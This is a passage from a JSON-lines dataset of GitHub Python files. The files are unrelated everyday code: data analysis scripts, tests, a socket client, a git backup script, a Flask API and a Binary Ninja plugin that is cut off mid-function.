time.time()\n\n # display total travel time\n total_travel_time = df['Trip Duration'].sum() / 3600.0\n print('Total Travel Time in hours:', int(total_travel_time))\n\n # display mean travel time\n mean_travel_time = df['Trip Duration'].mean() / 60.0\n print('Mean Travel Time', int(mean_travel_time))\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n user_types = df['User Type'].value_counts()\n print('User Type Counts:', user_types)\n\n\n # Display counts of gender\n try:\n gender_count = df['Gender'].value_counts()\n print('Gender count', gender_count)\n except:\n print('No Gender column exists for the selected file')\n\n # Display earliest, most recent, and most common year of birth\n try:\n earliest_birth_year = df['Birth Year'].min()\n recent_birth_year = df['Birth Year'].max()\n common_birth_year = df['Birth Year'].mode()[0]\n print('Earliest Birth Year', earliest_birth_year)\n print('Recent Birth Year', recent_birth_year)\n print('Common Birth Year',common_birth_year)\n except:\n print('No Details of Birth Year Exisits')\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"AnushaPanchumarthi/US-bikeshare","sub_path":"bikeshare_2.py","file_name":"bikeshare_2.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8799381209","text":"from logic.get_groups import get_row\nfrom logic.types import Dimensions, Grid\nfrom colorama import init, Fore\n\ninit()\n\n\ndef grid_to_string(grid: Grid, box_dimensions: Dimensions) -> str:\n width, height = box_dimensions[\"w\"], box_dimensions[\"h\"]\n cell_num = width * height\n str_length = len(f\"{cell_num}\")\n grid_str = \"\\n\"\n for i, row in enumerate([get_row(grid, n) for n in range(len(grid))]):\n if i != 0 and i % height == 0:\n box_bottom = (\"—\" * (str_length + 1)) * box_dimensions[\"w\"] + \"—+\"\n grid_str += (box_bottom * box_dimensions[\"h\"])[:-1] + \"\\n\"\n for j, cell in enumerate(row):\n if j != 0 and j % width == 0:\n grid_str += \" |\"\n grid_str += f\" {cell}\" if cell_num < 10 or len(cell) > 1 else f\" {cell} \"\n if j + 1 == len(row):\n grid_str += f\" {Fore.CYAN}{i + 1}{Fore.RESET}\\n\"\n if i + 1 == len(grid):\n grid_str += (\" \" if cell_num < 10 else \" \" * width + \" |\") * (height - 1)\n col_indices = [\n f\" {k}\" if cell_num < 10 or k > 9 else f\" {k} \"\n for k in range(1, cell_num + 1)\n ]\n col_indices = [\n f\" {char}\" if i != 0 and i % width * 2 == 0 else char\n for i, char in enumerate(col_indices)\n ]\n grid_str += f'\\n{Fore.CYAN + \"\".join(col_indices) + Fore.RESET}'\n\n return grid_str\n","repo_name":"scan-lan/wave_function_collapse_sudoku","sub_path":"ui/grid_to_string.py","file_name":"grid_to_string.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4669157834","text":"lines = open(\"input\", \"r\").readlines()\ncomb = {2: 1, 3: 7, 4: 4, 7: 8}\n\n\nans = 0\n\nfor line in lines:\n numbers = line.split(\"|\")[1].strip().split(\" \")\n for number in numbers:\n if comb.get(len(number)):\n ans += 1\n\nprint(ans)","repo_name":"ProgHaj/AdventOfCode2021","sub_path":"8/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26365837187","text":"import gensim\nimport numpy as np\nfrom sklearn.utils import check_array\nimport pickle\nimport random\n\nclass DataFeed:\n def __init__(self,data_config):\n self.data_config = data_config\n self.table = self.table_load()\n\n f = open(self.data_config['pkl_filePath'],'rb')\n data_dic = pickle.load(f)\n self.source_data = data_dic['source_data']\n # random.shuffle(self.source_data)\n self.source_NETypes_num = data_dic['source_NETypes_num']\n self.target_train_data = data_dic['target_train_data']\n self.target_test_data =data_dic['target_test_data']\n self.target_NETypes_num = data_dic['target_NETypes_num']\n self.id2label_dic= data_dic['id2label_dic']\n\n def table_load(self):\n # vecfpath = self.data_config['table_filePath']\n # word_embed = gensim.models.KeyedVectors.load_word2vec_format(vecfpath, binary=False, datatype=np.float32)\n # embed_mat = word_embed.syn0\n # embed_mat = check_array(embed_mat, dtype='float32', order='C')\n f = open(self.data_config['table_filePath'],'rb')\n dictionary = pickle.load(f)\n del dictionary\n embed_mat = pickle.load(f)\n return embed_mat\n\n def table_generator(self):\n return self.table\n\n def source_data_generator(self,mode,**kwargs):\n if mode == 'train':\n batch_num = kwargs['batch_num']\n batch_size = kwargs['batch_size']\n data_temp = self.source_data[:]\n elif mode == 'test':\n data_temp = self.source_data[-1000:]\n\n if mode == 'train':\n train_size = len(data_temp)\n start = batch_num * batch_size % train_size\n end = (batch_num * batch_size + batch_size) % train_size\n if start < end:\n batch = data_temp[start:end]\n elif start >= end:\n batch = data_temp[start:]\n batch.extend(data_temp[0:end])\n else:\n batch = data_temp\n X = []\n Y_ = []\n for instance in batch:\n X.append(np.array(instance[0], dtype='int32'))\n Y_.append(np.array(instance[1], dtype='int32'))\n\n # during validation and test, to avoid errors are counted repeatedly,\n # we need to avoid the same data sended back repeately\n # print('X len: ',str(len(X)))\n # print('Y_ len: ',str(len(Y_)))\n # print('X: ')\n # for x in X:\n # print('type: ',type(x),' len: ',str(len(x)),'\\n')\n # np.array(X)\n # print('Y_: ')\n # for y in Y_:\n # print('type: ', type(y), ' len: ', str(len(y)), '\\n')\n # np.array(Y_)\n # print('====================')\n return (np.array(X,dtype='int32'), np.array(Y_,dtype='int32'))\n\n def target_data_generator(self,mode,**kwargs):\n if mode == 'train':\n batch_num = kwargs['batch_num']\n batch_size= kwargs['batch_size']\n data_temp = self.target_train_data[self.data_config['k_instances']]\n else:\n data_temp = self.target_test_data\n\n if mode == 'train':\n train_size = len(data_temp)\n start = batch_num * batch_size % train_size\n end = (batch_num * batch_size + batch_size) % train_size\n if start < end:\n batch = data_temp[start:end]\n elif start >= end:\n batch = data_temp[start:]\n batch.extend(data_temp[0:end])\n else:\n batch = data_temp\n X = []\n Y_ = []\n for instance in batch:\n X.append(np.array(instance[0], dtype='int32'))\n Y_.append(np.array(instance[1], dtype='int32'))\n\n # during validation and test, to avoid errors are counted repeatedly,\n # we need to avoid the same data sended back repeately\n return (np.array(X, dtype='int32'), np.array(Y_, dtype='int32'))\n\n def id2label_generator(self):\n return self.id2label_dic\n\n\nclass DataFeedTest:\n def __init__(self):\n pass","repo_name":"zapplea/emnlp_baseline","sub_path":"simple_multiclass/datafeed.py","file_name":"datafeed.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"43561253218","text":"import pytest\nfrom demoproject.demoapp.models import DemoMultipleModel, Sender1, Sender2\nfrom django.forms.models import modelform_factory\nfrom django.urls import reverse\nfrom strategy_field.utils import fqn\n\n\ndef pytest_generate_tests(metafunc):\n func_name = metafunc.function.__name__\n values = ids = []\n if \"target\" in metafunc.fixturenames:\n if func_name.endswith(\"_lookup_in\"):\n values = [\n lambda o: [fqn(o.sender[0])],\n lambda o: o.sender,\n lambda o: [fqn(Sender1), fqn(Sender2)],\n lambda o: [Sender1, Sender2],\n ]\n ids = [\"fqn(target.sender)\", \"target.sender\", \"fqn(Sender1)\", \"Sender1\"]\n else:\n values = [lambda o: [fqn(Sender1)], lambda o: [Sender1]]\n ids = [\"fqn(Sender1)\", \"Sender1\"]\n\n if \"demo_multiple_model\" in metafunc.fixturenames:\n values.extend([lambda o: [fqn(o.sender[0])], lambda o: o.sender])\n ids.extend([\"fqn(target.sender)\", \"target.sender\"])\n\n metafunc.parametrize(\"target\", values, ids=ids)\n\n\ndef test_field_none():\n d = DemoMultipleModel(sender=None)\n assert d.sender is None\n\n\n@pytest.mark.django_db\ndef test_field_none_saved():\n d = DemoMultipleModel(sender=None)\n d.sender = None\n d.save()\n assert d.sender is None\n\n\ndef test_field_empty():\n d = DemoMultipleModel(sender=[])\n assert d.sender == []\n\n\ndef test_field_empty_len():\n expected = 0\n d = DemoMultipleModel(sender=[])\n assert d.sender.__len__() == expected\n\n\ndef test_field():\n d = DemoMultipleModel(sender=Sender1)\n assert d.sender == [Sender1]\n\n\n@pytest.mark.django_db\ndef test_basic():\n d = DemoMultipleModel(sender=Sender1)\n d.save()\n assert d.sender == [Sender1]\n\n d = DemoMultipleModel(sender=[Sender1])\n d.save()\n assert d.sender == [Sender1]\n\n d = DemoMultipleModel()\n d.sender = Sender1\n d.save()\n assert d.sender == [Sender1]\n\n d = DemoMultipleModel()\n d.sender = [Sender1]\n d.save()\n assert d.sender == [Sender1]\n\n d = DemoMultipleModel()\n d.sender = [Sender1, Sender2]\n d.save()\n assert d.sender == [Sender1, Sender2]\n\n\n@pytest.mark.django_db\ndef test_model_save(target):\n d = DemoMultipleModel(sender=target(None))\n d.save()\n assert d.sender == [Sender1]\n\n\n@pytest.mark.django_db\ndef test_model_get_or_create(target):\n d, __ = DemoMultipleModel.objects.get_or_create(sender=target(None))\n assert d.sender == [Sender1]\n\n\n@pytest.mark.django_db\ndef test_model_load(demo_multiple_model):\n d = DemoMultipleModel.objects.get(pk=demo_multiple_model.pk)\n assert d.sender == [Sender1]\n\n\n@pytest.mark.django_db\ndef test_form(demo_multiple_model, registry):\n # demo_multiple_model._meta.get_field_by_name('sender')[0].registry = registry\n demo_multiple_model._meta.get_field(\"sender\").registry = registry\n form_class = modelform_factory(DemoMultipleModel, exclude=[])\n form = form_class(instance=demo_multiple_model)\n assert form.fields[\"sender\"].choices == registry.as_choices()\n\n\n@pytest.mark.django_db\ndef test_form_save(demo_multiple_model):\n form_class = modelform_factory(DemoMultipleModel, exclude=[])\n form = form_class(\n {\"sender\": [fqn(demo_multiple_model.sender[0])]}, instance=demo_multiple_model\n )\n form.is_valid()\n instance = form.save()\n assert instance.sender == demo_multiple_model.sender\n\n\n@pytest.mark.django_db\ndef test_form_not_valid(demo_multiple_model):\n form_class = modelform_factory(DemoMultipleModel, exclude=[])\n form = form_class(\n {\"sender\": [fqn(DemoMultipleModel)]}, instance=demo_multiple_model\n )\n assert not form.is_valid()\n assert form.errors[\"sender\"] == [\n \"Select a valid choice. \"\n \"demoproject.demoapp.models.DemoMultipleModel \"\n \"is not one of the available choices.\"\n ]\n\n\n@pytest.mark.django_db\ndef test_form_default(demo_multiple_model):\n form_class = modelform_factory(DemoMultipleModel, exclude=[])\n form = form_class(instance=demo_multiple_model)\n assert form.fields[\"sender\"].choices == [\n (\"demoproject.demoapp.models.Sender1\", \"demoproject.demoapp.models.Sender1\"),\n (\"demoproject.demoapp.models.Sender2\", \"demoproject.demoapp.models.Sender2\"),\n ]\n\n\n@pytest.mark.django_db\ndef test_admin_demo_multiple_model_add(webapp, admin_user):\n res = webapp.get(\"/demoapp/demomultiplemodel/add/\", user=admin_user)\n form = res.forms[\"demomultiplemodel_form\"]\n\n form[\"sender\"] = [\"demoproject.demoapp.models.Sender1\"]\n form.submit().follow()\n assert (\n DemoMultipleModel.objects.filter(\n sender=\"demoproject.demoapp.models.Sender1\"\n ).count()\n == 1\n )\n\n\n@pytest.mark.django_db\ndef test_admin_demo_multiple_model_edit(webapp, admin_user, demo_multiple_model):\n url = reverse(\n \"admin:demoapp_demomultiplemodel_change\", args=[demo_multiple_model.pk]\n )\n res = webapp.get(url, user=admin_user)\n form = res.forms[\"demomultiplemodel_form\"]\n\n form[\"sender\"] = [\"demoproject.demoapp.models.Sender2\"]\n form.submit().follow()\n assert (\n DemoMultipleModel.objects.filter(\n sender=\"demoproject.demoapp.models.Sender2\"\n ).count()\n == 1\n )\n\n\n@pytest.mark.django_db\ndef test_demo_multiple_model_lookup_equal(demo_multiple_model, target):\n assert (\n DemoMultipleModel.objects.get(sender=target(demo_multiple_model))\n == demo_multiple_model\n )\n\n\n@pytest.mark.django_db\ndef test_demo_multiple_model_lookup_contains(demo_multiple_model, target):\n assert (\n DemoMultipleModel.objects.get(sender__contains=target(demo_multiple_model))\n == demo_multiple_model\n )\n\n\n@pytest.mark.django_db\ndef test_demo_multiple_model_lookup_in(demo_multiple_model, target):\n with pytest.raises(TypeError):\n assert (\n DemoMultipleModel.objects.get(sender__in=[target(demo_multiple_model)])\n == demo_multiple_model\n )\n","repo_name":"saxix/django-strategy-field","sub_path":"tests/test_multiple.py","file_name":"test_multiple.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"74851315664","text":"import logging\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\n# Определение базового класса страницы\nclass BasePage:\n # Инициализация драйвера и базового URL\n def __init__(self, driver):\n self.driver = driver\n self.base_url = \"https://test-stand.gb.ru\"\n\n # Метод для поиска элемента на странице с заданным локатором и временем ожидания\n def find_element(self, locator, time=10):\n try:\n # Возвращаем элемент, если он найден в течение заданного времени ожидания\n return WebDriverWait(self.driver, time).until(EC.presence_of_element_located(locator),\n message=f\"Can't find element by locator {locator}\")\n except TimeoutException:\n # Записываем исключение в лог, если время ожидания истекло и элемент не был найден\n logging.exception(\"Timeout exception while searching for element with locator %s\", locator)\n return None\n\n # Метод для получения свойства элемента\n def get_element_property(self, mode, locator, property):\n # Ищем элемент\n element = self.find_element(mode, locator)\n if element:\n # Возвращаем значение свойства, если элемент найден\n return element.value_of_css_property(property)\n else:\n # Записываем ошибку в лог, если элемент не найден\n logging.error(\"Can't get property %s from non-existing element with locator %s\", property, locator)\n return None\n\n # Метод для перехода на сайт по базовому URL\n def go_to_site(self):\n try:\n self.driver.get(self.base_url)\n except Exception as e:\n # Записываем исключение в лог, если возникла ошибка при открытии сайта\n logging.exception(\"Exception occurred while opening site: %s\", e)\n\n # Метод для получения уведомления (alert)\n def get_alert(self, time=10):\n try:\n # Возвращаем уведомление, если оно появляется в течение заданного времени ожидания\n return WebDriverWait(self.driver, time).until(EC.alert_is_present(),\n message=\"Alert not found\")\n except TimeoutException:\n # Записываем исключение в лог, если время ожидания истекло и уведомление не появилось\n logging.exception(\"Timeout exception while waiting for alert\")\n return None\n","repo_name":"ikodzoev/web_test","sub_path":"HW_4/BaseApp.py","file_name":"BaseApp.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34628204318","text":"import unittest\nimport numpy as np\n\nfrom numpy.testing import assert_allclose\n\nfrom gpflow.models.svgp import SVGP\nfrom gpflow.models import GPR\nfrom gpflow.kernels import Matern52, RBF\nfrom gpflow.likelihoods import Gaussian, Bernoulli, MultiClass\nfrom gpflow.training import ScipyOptimizer\nfrom gpflow.training import NatGradOptimizer\nfrom doubly_stochastic_dgp.dgp import DGP, DGP_Base, DGP_Quad\nfrom doubly_stochastic_dgp.model_zoo import DGP_Collapsed\nfrom doubly_stochastic_dgp.layers import SGPR_Layer\nfrom doubly_stochastic_dgp.layer_initializations import init_layers_linear\n\nnp.random.seed(100)\n\nclass TestVsSingleLayer(unittest.TestCase):\n def setUp(self):\n Ns, N, M, D_X, D_Y = 5, 4, 2, 3, 2\n self.lik_var = 0.1\n\n self.X = np.random.uniform(size=(N, D_X))\n self.Y = np.random.uniform(size=(N, D_Y))\n self.Z = np.random.uniform(size=(M, D_Y))\n self.Xs = np.random.uniform(size=(Ns, D_X))\n self.D_Y = D_Y\n\n def test_single_layer(self):\n kern = RBF(1, lengthscales=0.1)\n layers = init_layers_linear(self.X, self.Y, self.X, [kern])\n\n lik = Gaussian()\n lik.variance = self.lik_var\n\n last_layer = SGPR_Layer(layers[-1].kern,\n layers[-1].feature.Z.read_value(),\n self.D_Y,\n layers[-1].mean_function)\n layers = layers[:-1] + [last_layer]\n\n m_dgp = DGP_Collapsed(self.X, self.Y, lik, layers)\n L_dgp = m_dgp.compute_log_likelihood()\n mean_dgp, var_dgp = m_dgp.predict_f_full_cov(self.Xs, 1)\n\n m_exact = GPR(self.X, self.Y, kern)\n m_exact.likelihood.variance = self.lik_var\n L_exact = m_exact.compute_log_likelihood()\n mean_exact, var_exact = m_exact.predict_f_full_cov(self.Xs)\n\n assert_allclose(L_dgp, L_exact, atol=1e-5, rtol=1e-5)\n assert_allclose(mean_dgp[0], mean_exact, atol=1e-5, rtol=1e-5)\n assert_allclose(var_dgp[0], var_exact, atol=1e-5, rtol=1e-5)\n\n\nclass TestVsNatGrads(unittest.TestCase):\n def test_2layer_vs_nat_grad(self):\n Ns, N, M = 5, 1, 50\n D_X, D_Y = 1, 1\n\n lik_var = 0.1\n\n X = np.random.uniform(size=(N, D_X))\n Y = np.random.uniform(size=(N, D_Y))\n Z = np.random.uniform(size=(M, D_Y))\n Xs = np.random.uniform(size=(Ns, D_X))\n\n Z[:N, :] = X[:M, :]\n\n def kerns():\n return [RBF(D_X, lengthscales=0.1),\n RBF(D_X, lengthscales=0.5)]\n layers_col = init_layers_linear(X, Y, Z, kerns())\n layers_ng = init_layers_linear(X, Y, Z, kerns())\n\n def lik():\n l = Gaussian()\n l.variance = lik_var\n return l\n\n last_layer = SGPR_Layer(layers_col[-1].kern,\n layers_col[-1].feature.Z.read_value(),\n D_Y,\n layers_col[-1].mean_function)\n\n layers_col = layers_col[:-1] + [last_layer]\n m_col = DGP_Collapsed(X, Y, lik(), layers_col)\n m_ng = DGP_Quad(X, Y, lik(), layers_ng, H=200)\n\n q_mu1 = np.random.randn(M, D_X)\n q_sqrt1 = np.random.randn(M, M)\n q_sqrt1 = np.tril(q_sqrt1)[None, :, :]\n\n for m in m_col, m_ng:\n m.layers[0].q_mu = q_mu1\n m.layers[0].q_sqrt = q_sqrt1\n\n p = [[m_ng.layers[-1].q_mu, m_ng.layers[-1].q_sqrt]]\n NatGradOptimizer(gamma=1.).minimize(m_ng, var_list=p, maxiter=1)\n\n\n assert_allclose(m_col.compute_log_likelihood(),\n m_ng.compute_log_likelihood())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"UCL-SML/Doubly-Stochastic-DGP","sub_path":"tests/test_collapsed.py","file_name":"test_collapsed.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"48"} +{"seq_id":"15439823755","text":"import torch.distributed as dist\n\n\ndef get_dist_info():\n \"\"\"Get distributed info.\"\"\"\n if dist.is_available():\n initialized = dist.is_initialized()\n else:\n initialized = False\n if initialized:\n rank = dist.get_rank()\n world_size = dist.get_world_size()\n else:\n rank = 0\n world_size = 1\n return rank, world_size\n","repo_name":"FlowEternal/pointlanenet","sub_path":"model/vega/common/utils_torch.py","file_name":"utils_torch.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13736868082","text":"import os\nfrom distutils.sysconfig import get_python_lib\n\n#Set path\nprint(\">>> Add path to python library ...\")\n\npwd = os.getcwd()\nlib_path = get_python_lib()\npath_file = os.path.join(lib_path,'relocation.pth')\nwith open(path_file,'w') as f:\n f.write(pwd)\nf.close()\n\nprint(\"Done!\")\n","repo_name":"zijinping/CUHK_Seismology_Python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"23912721270","text":"import socket\nimport sys\n\nHOST, PORT = \"localhost\", 9999\nfileName = \" \".join(sys.argv[1:])\nwith open(fileName) as f:\n data = f.read()\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n sock.connect((HOST, PORT))\n sock.sendall(bytes(data + \"\\n\", \"utf-8\"))\n\n # Receive data from the server and shut down\n received = str(sock.recv(1024), \"utf-8\")\nfinally:\n sock.close()\n\nprint(\"Sent: {}\".format(data))\nprint(\"Received: {}\".format(received))","repo_name":"abelousova/python-diht-2014","sub_path":"homework09.05/SendFile/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31081183765","text":"class Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n Map = dict()\n \n for i in nums1:\n Map[i] = Map.get(i,0)+1\n \n res = []\n for num in nums2:\n if num in Map and Map[num]>0:\n Map[num] -= 1\n res.append(num)\n return res\n ","repo_name":"Merwan-J/competetive-programming","sub_path":"350-intersection-of-two-arrays-ii/350-intersection-of-two-arrays-ii.py","file_name":"350-intersection-of-two-arrays-ii.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20869626496","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nimport json\nimport os\n\n# /home/lane\nbase_path = os.path.expanduser('~')\ngitbak_dir = f\"{base_path}/gitbak/\"\ntoken_file = f\"{gitbak_dir}/.token_file\"\n\nwith open(token_file, 'r') as fr:\n token_file_content = fr.read()\n token_file_content = token_file_content.strip()\n\n\"\"\"\n URL which able to retrieve PRIVATE repos:\n `https://api.github.com/search/repositories?q=user:zhanglintc`\n Note: `user` can be replaced with `org`, if you're tring to retrieve organization information.\n Refer: https://github.community/t/how-to-get-list-of-private-repositories-via-api-call/120175/2\n\n\n URL which only able to retrieve PUBLIC repos:\n `https://api.github.com/users/zhanglintc/repos`\n\n How to provide a access token:\n `https://developer.github.com/changes/2020-02-10-deprecating-auth-through-query-param/`\n\"\"\"\n\n\ntoken = token_file_content\nurl = \"https://api.github.com/search/repositories\"\n\n\ndef gitbak(userName):\n params = {\n 'q': f'user:{userName}',\n 'per_page': 999,\n }\n headers = {\n 'Authorization': f'token {token}',\n }\n res = requests.get(url, params=params, headers=headers)\n\n o = json.loads(res.text)\n items = o['items']\n repos = [it['ssh_url'] for it in items]\n\n if not os.path.exists('{0}/gitbak/{1}'.format(base_path, userName)):\n os.makedirs('{0}/gitbak/{1}'.format(base_path, userName))\n\n dirs = os.listdir('{0}/gitbak/{1}'.format(base_path, userName))\n\n for repo in repos:\n repoName = repo.split('/')[1][:-4]\n if repoName not in dirs:\n os.system('cd {0}/gitbak/{1} && git clone {2}'.format(base_path, userName, repo))\n else:\n os.system('cd {0}/gitbak/{1}/{2} && git pull'.format(base_path, userName, repoName))\n\nif __name__ == '__main__':\n gitbak(\"zhanglintc\")\n gitbak(\"Theodolite\")\n gitbak(\"Mmrz-Repos\")\n\nos.system('date >> {0}/gitbak/gitbak.log'.format(base_path))\n\n\n","repo_name":"zhanglintc/tools-lite","sub_path":"python/autopull.py","file_name":"autopull.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28713911199","text":"import json\nimport os\nimport re\nimport time\nfrom typing import Tuple\n\nimport flask.scaffold\nimport teradatasql\nimport werkzeug\nfrom flask import Flask, request\nfrom werkzeug.middleware.proxy_fix import ProxyFix\n\n\n# workaround to fix an import error of flask_restplus\nflask.helpers._endpoint_from_view_func = flask.scaffold._endpoint_from_view_func\nwerkzeug.cached_property = werkzeug.utils.cached_property # type: ignore\nfrom flask_restplus import Api, Resource, fields, marshal # noqa: E402\n\n\napp = Flask(__name__)\napp.wsgi_app = ProxyFix(app.wsgi_app)\napi = Api(app, validate=True, skip_none=True)\n\n\napi = api.namespace('', description='Dataproc Cluster operations')\n\ncluster = api.model('Cluster', {\n 'id': fields.Integer(readonly=True, description='The cluster unique identifier'),\n 'cluster': fields.String(required=True, description='The cluster details')\n})\n\njob = api.model('Job', {\n 'id': fields.Integer(readonly=True, description='The job unique identifier'),\n 'job': fields.String(required=True, description='The job details'),\n 'cluster_id': fields.String(required=True, description='The cluster details')\n\n})\n\nclass ClusterOperator(object):\n def __init__(self):\n self.counter = 0\n self.clusters = []\n\n def get(self, id):\n for cluster in self.clusters:\n if cluster['id'] == id:\n return cluster\n api.abort(404, \"cluster {} doesn't exist\".format(id))\n\n def create(self, data):\n cluster = data\n cluster['id'] = self.counter = self.counter + 1\n self.clusters.append(cluster)\n return cluster\n\n def delete(self, id):\n cluster = self.get(id)\n self.clusters.remove(cluster)\n\nclass JobOperator(object):\n def __init__(self):\n self.counter = 0\n self.jobs = []\n\n def get(self, id):\n for job in self.jobs:\n if job['id'] == id:\n return job\n api.abort(404, \"job {} doesn't exist\".format(id))\n\n def create(self, data):\n job = data\n job['id'] = self.counter = self.counter + 1\n self.jobs.append(job)\n return job\n\n\nClusterOperator = ClusterOperator()\nClusterOperator.create({'cluster': 'data-preparation-cluster-1'})\nClusterOperator.create({'cluster': 'data-preparation-cluster-2'})\nClusterOperator.create({'cluster': 'data-validation-cluster-1'})\n\n@api.route('/cluster')\nclass ClusterList(Resource):\n '''Shows a list of all clusters, and lets you POST to add new clusters'''\n @api.doc('list_clusters')\n @api.marshal_list_with(cluster)\n def get(self):\n '''List all clusters'''\n return ClusterOperator.clusters\n\n @api.doc('create_cluster')\n @api.expect(cluster)\n @api.marshal_with(cluster, code=201)\n def post(self):\n '''Create a new cluster'''\n return ClusterOperator.create(api.payload), 201\n\n\n@api.route('/cluster/')\n@api.response(404, 'cluster not found')\n@api.param('id', 'The cluster identifier')\nclass Cluster(Resource):\n '''Show a single cluster item and lets you delete them'''\n @api.doc('get_cluster')\n @api.marshal_with(cluster)\n def get(self, id):\n '''Fetch a given resource'''\n return ClusterOperator.get(id)\n\n @api.doc('delete_cluster')\n @api.response(204, 'cluster deleted')\n def delete(self, id):\n '''Delete a cluster given its identifier'''\n ClusterOperator.delete(id)\n return '', 204\n\n @api.expect(cluster)\n @api.marshal_with(cluster)\n def put(self, id):\n '''Update a cluster with the job given its identifier'''\n return ClusterOperator.update(id, api.payload)\n\n\nJobOperator = JobOperator()\nJobOperator.create({'job': 'dataprep-job-1', 'cluster_id': 'data-preparation-cluster-1'})\nJobOperator.create({'job': 'dataprep-job-2', 'cluster_id': 'data-preparation-cluster-1'})\nJobOperator.create({'job': 'dataprep-job-3', 'cluster_id': 'data-validation-cluster-1'})\n\n@api.route('/job')\nclass JobList(Resource):\n '''Shows a list of all jobs, and lets you POST to add new jobs'''\n @api.doc('list_jobs')\n @api.marshal_list_with(job)\n def get(self):\n '''List all jobs'''\n return JobOperator.jobs\n\n @api.doc('create_job')\n @api.expect(job)\n @api.marshal_with(job, code=201)\n def post(self):\n '''Create a new job'''\n return JobOperator.create(api.payload), 201\n\nif __name__ == '__manin__':\n app.run(host='127.0.0.1', port=5000)\n","repo_name":"yuyatinnefeld/google-cloud","sub_path":"app-engine/resources/swagger/cluster_temp.py","file_name":"cluster_temp.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19323524780","text":"#!/usr/bin/env python3\n\"\"\"Provides menu options to control the ``pd-ninja`` plugin.\n\"\"\"\nfrom binaryninja.binaryview import SectionSemantics\nfrom binaryninja.types import Symbol\nfrom binaryninja.types import SymbolType\nfrom binaryninja.plugin import PluginCommand\nfrom binaryninja.log import log_info\nfrom binaryninja.log import log_error\nfrom binaryninja.binaryview import BinaryView\nfrom binaryninja.typeparser import TypeParser\n\nfrom .pd_magic import IVT_LEN\nfrom .pd_magic import PD_HEADER_FLAGS\nfrom .pd_magic import PLAYDATE_KERNEL_START\nfrom .pd_magic import STM32F7_IVT_NAMES\nfrom .pd_magic import get_system_headers\nfrom .pd_utils import get_sdk_root\nfrom .pd_utils import addr_valid\nfrom .pd_utils import dest_section\nfrom .pd_types import make_stable_library\nfrom .pd_symbols_db import SymbolsDB\n\n\ndef apply_symbols_db(bv: BinaryView):\n \"\"\"Loads provided symbols from the SDK\n\n Parameters\n ----------\n bv : BinaryView\n SDK to process\n \"\"\"\n pd_sdk = get_sdk_root()\n if not pd_sdk:\n log_info(\"Failed to provide SDK path\")\n return\n\n thumb_addr_mask = 0xFFFFFFFE\n s = SymbolsDB(pd_sdk.symbols_db)\n log_info(f\"Loading symbols from symbols.db\")\n\n # note the omission of \"strip_hideen=True\", we postprocess here\n # and define an auto-function where all the hidden functions are\n # so binary ninja can still pick up all the functions to analyze\n funcs = s.get_first_functions()\n\n # make all these definitions 1 undo just in case\n # somthing is real borked up\n bv.begin_undo_actions()\n\n # add all the symbols, playdate calls them functions, which is\n # patently false, they're just a bunch of linker symbols\n for f in funcs:\n # don't need to worry about any kernel / user distinctions here\n if not addr_valid(bv, f.address):\n continue\n\n section = dest_section(bv, f.address)\n address = f.address & thumb_addr_mask\n\n # depending on the semantics of the section we will create\n # different symbol type\n if section.semantics & SectionSemantics.ReadOnlyCodeSectionSemantics:\n # code, define a function\n if f.name == \"hidden\":\n bv.define_auto_symbol_and_var_or_function(\n Symbol(SymbolType.FunctionSymbol, address,\n f\"sub_{hex(address)[2:]}\"), None\n )\n else:\n # not \"hidden\", so make an actual function\n bv.create_user_function(address)\n bv.define_user_symbol(\n Symbol(SymbolType.FunctionSymbol, address, f.name))\n else:\n # data\n if f.name == \"hidden\":\n bv.define_auto_symbol_and_var_or_function(\n 